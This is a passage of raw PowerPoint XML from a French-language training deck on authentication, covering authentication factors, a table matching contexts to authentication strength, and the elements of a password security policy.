                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6- La voici</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Icône Ordinateur portable Gratuit de Computer hardware icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CAA1B5-D603-4B6B-8EA3-554322796F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2915" y="1558367"/>
            <a:ext cx="1824466" cy="1824466"/>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6840B6E4-B175-40B2-9E9F-4515B75C01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46443" y="1556519"/>
            <a:ext cx="2076953" cy="2076953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connecteur droit avec flèche 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80EF2F7F-EC95-4F86-AB55-5B4BB846094C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3075709" y="2836232"/>
            <a:ext cx="914400" cy="914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Connecteur droit avec flèche 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06177D32-FB8C-4ADC-A589-007A54AC26C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808514" y="2129246"/>
            <a:ext cx="6704763"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necteur droit avec flèche 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F5CD22-BA3B-4EA9-82F2-5ACA060CB19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2808514" y="3223643"/>
            <a:ext cx="658167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onnecteur droit avec flèche 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13EA6D3A-2B96-43A7-AC9B-658C094274E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897527" y="4181903"/>
            <a:ext cx="6615750" cy="21939"/>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onnecteur droit avec flèche 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279B05C6-8E6C-4614-A1E8-8778B67B4764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2805164" y="5023668"/>
            <a:ext cx="658167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onnecteur droit avec flèche 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA85800-373F-432C-8813-34CFAB5922FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2853020" y="5849943"/>
            <a:ext cx="6615750" cy="21939"/>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onnecteur droit avec flèche 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9104847C-CCCB-4B03-B184-EFE43ACB8583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2870060" y="6568541"/>
            <a:ext cx="658167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235017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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="460948"/>
            <a:ext cx="10963145" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Authentification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94386A09-5D43-4827-8FCA-42CB97A0D74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495549" y="4323600"/>
            <a:ext cx="7200900" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il existe plusieurs types d’authentification :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’authentification simple : identifiant + mot de passe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’authentification forte : mise en œuvre de plusieurs facteurs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B3C614-D265-43EA-999A-BC941728FDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495549" y="1998041"/>
            <a:ext cx="7200900" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="22000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’authentification consiste à prouver son identité. Il existe plusieurs facteurs d’authentification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La connaissance : mot de passe, code PIN, question secrète</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La possession : téléphone, carte à puce, badge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’appartenance : empreinte, rétine, visage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37345716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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="460948"/>
            <a:ext cx="10963145" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Contexte d’authentification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Tableau 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE82F11-6E55-4F0E-845E-280A5DFBBC27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="522206117"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1648083" y="1489772"/>
          <a:ext cx="8895832" cy="4907280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2223958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="97721749"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2223958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="443903194"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2223958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4239519379"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2223958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3414267944"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Exemple de contexte</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Sensibilité des données ou du service</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Importance de la menace</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Moyen d’authentification</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="959204176"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Plate-forme de réservation de terrain de tennis</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Peu sensible</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Faible (modification de la réservation)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Login / Mot de passe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1465854930"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Site Web publicitaire</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Moyennement sensible</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Moyenne (interruption ou défiguration du site) </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Login / Mot de passe robuste</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1153831830"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Messagerie professionnelle</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Sensible</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Moyenne (interruption du service, compromission d’informations métier sensibles, qui peuvent être d’ordre industriel, financier, concurrentiel, etc.)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Mot de passe robuste + second facteur possible </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4211481218"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Système d’information d’administration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Très sensible</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t>Importante (compromission complète du système d’information)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
                        <a:t>Multifacteur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
                        <a:t> fort (ex. : carte à puce et code PIN)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3934811489"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303272273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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="460948"/>
            <a:ext cx="10963145" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Politique de sécurité MDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94386A09-5D43-4827-8FCA-42CB97A0D74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="890198" y="1524961"/>
            <a:ext cx="9709378" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">
              <a:alpha val="61000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il est recommandé de mettre en place une politique de sécurité des mots passe adaptée au contexte et aux objectifs de sécurité du système d’information. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6A9356-06DC-42B8-9EE9-3B4A66339A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="890198" y="2432036"/>
            <a:ext cx="9709378" cy="4190314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ longueur des mots de passe; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ règles de complexité des mots de passe (c.-à-d. les types de caractères utilisables) ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ délai d’expiration des mots de passe; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ mécanismes de limitation d’essais d’authentification; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ mécanismes de contrôle de la robustesse des mots de passe; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ méthode de conservation des mots de passe; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ méthode de recouvrement d’accès en cas de perte ou de vol des mots de passe; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ mise à disposition d’un coffre-fort de mots de passe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
